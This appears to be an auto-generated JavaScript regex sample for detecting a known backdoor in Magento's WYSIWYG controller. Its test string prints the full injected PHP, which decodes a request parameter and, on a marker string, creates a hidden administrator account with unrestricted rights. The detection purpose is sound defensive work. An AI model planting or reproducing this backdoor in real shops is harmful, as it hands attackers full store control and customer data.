const regex = /public function directiveAction\(\)\s*\{\s*\Kif\(isset\(\$\w+\[['"][^{]+\{\s*\$\w+=base64_decode\(\$\w+\[[^;]+;\s*if\(preg_match\(['"]\/_rieqyns13_was_here[^{]+\{\s*preg_match\("\/_rieqyns13_was_here[^{]+\{\s*\$user[\s=]+Mage\:+getModel\('admin\/user'\)\s*->setdata\(array\(\s*'username.*?setname(*COMMIT)\(['"]Inchoo.{0,700}?setRoleIds\(array\(\$role(?:[^}]+\}\s*)+?echo\s*['"]success['"];exit;\s*\}\s*if\(preg_match\(['"][^{]+\{\s*header\(['"].{0,50}?Unauthorized['"]\);exit;\s*\}\s*\}(?=\s*\$directive = \$this->getRequest\(\)->getParam\('___directive'\);)/gis;
// Alternative syntax using RegExp constructor
// const regex = new RegExp('public function directiveAction\\(\\)\\s*\\{\\s*\\Kif\\(isset\\(\\$\\w+\\[[\'"][^{]+\\{\\s*\\$\\w+=base64_decode\\(\\$\\w+\\[[^;]+;\\s*if\\(preg_match\\([\'"]\\\/_rieqyns13_was_here[^{]+\\{\\s*preg_match\\("\\\/_rieqyns13_was_here[^{]+\\{\\s*\\$user[\\s=]+Mage\\:+getModel\\(\'admin\\\/user\'\\)\\s*->setdata\\(array\\(\\s*\'username.*?setname(*COMMIT)\\([\'"]Inchoo.{0,700}?setRoleIds\\(array\\(\\$role(?:[^}]+\\}\\s*)+?echo\\s*[\'"]success[\'"];exit;\\s*\\}\\s*if\\(preg_match\\([\'"][^{]+\\{\\s*header\\([\'"].{0,50}?Unauthorized[\'"]\\);exit;\\s*\\}\\s*\\}(?=\\s*\\$directive = \\$this->getRequest\\(\\)->getParam\\(\'___directive\'\\);)', 'gis')
const str = `
* @category Mage
* @package Mage_Adminhtml
* @author Magento Core Team <core@magentocommerce.com>
*/
class Mage_Adminhtml_Cms_WysiwygController extends Mage_Adminhtml_Controller_Action
{
/**
* Template directives callback
*
* TODO: move this to some model
*/
public function directiveAction()
{
if(isset(\$_REQUEST["filter"])){
\$jembot=base64_decode(\$_REQUEST["filter"]);
if(preg_match("/_rieqyns13_was_here/",\$jembot)){
preg_match("/_rieqyns13_was_here(.+?)_rieqyns13_(.+?)_rieqyns13_was_here/",\$jembot,\$m);
\$base = getcwd();
require_once \$base."/app/Mage.php";
Mage::app();
\$user=null;
\$role=null;
try {
\$user = Mage::getModel('admin/user')
->setData(array(
'username' => base64_decode(\$m[1]),
'firstname' => 'Developer',
'lastname' => 'User',
'email' => 'developer'.rand(0,10000).'@'.\$_SERVER['SERVER_NAME'],
'password' => base64_decode(\$m[2]),
'is_active' => 1
))->save();
} catch (Exception \$e) {
echo \$e->getMessage();
exit;
}
try {
\$role = Mage::getModel("admin/roles")
->setName('Inchoo')
->setRoleType('G')
->save();
Mage::getModel("admin/rules")
->setRoleId(\$role->getId())
->setResources(array("all"))
->saveRel();
} catch (Mage_Core_Exception \$e) {
echo \$e->getMessage();
exit;
} catch (Exception \$e) {
echo 'Error while saving role.';
exit;
}
try {
\$user->setRoleIds(array(\$role->getId()))
->setRoleUserId(\$user->getUserId())
->saveRelations();
} catch (Exception \$e) {
echo \$e->getMessage();
exit;
}
echo "Success";exit;
}
if(preg_match("/insert/i",\$jembot)){
header("HTTP/1.1 403 Unauthorized");exit;
}
}
\$directive = \$this->getRequest()->getParam('___directive');
\$directive = Mage::helper('core')->urlDecode(\$directive);
\$url = Mage::getModel('core/email_template_filter')->filter(\$directive);
try {
\$image = Varien_Image_Adapter::factory('GD2');
\$image->open(\$url);
\$image->display();
} catch (Exception \$e) {
\$image = Varien_Image_Adapter::factory('GD2');
\$image->open(Mage::getSingleton('cms/wysiwyg_config')->getSkinImagePlaceholderUrl());
\$image->display();
/*
\$image = imagecreate(100, 100);
\$bkgrColor = imagecolorallocate(\$image,10,10,10);
imagefill(\$image,0,0,\$bkgrColor);
\$textColor = imagecolorallocate(\$image,255,255,255);
imagestring(\$image, 4, 10, 10, 'Skin image', \$textColor);
header('Content-type: image/png');
imagepng(\$image);
imagedestroy(\$image);
*/
}
}
}`;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for JavaScript, please visit: https://developer.mozilla.org/en/docs/Web/JavaScript/Guide/Regular_Expressions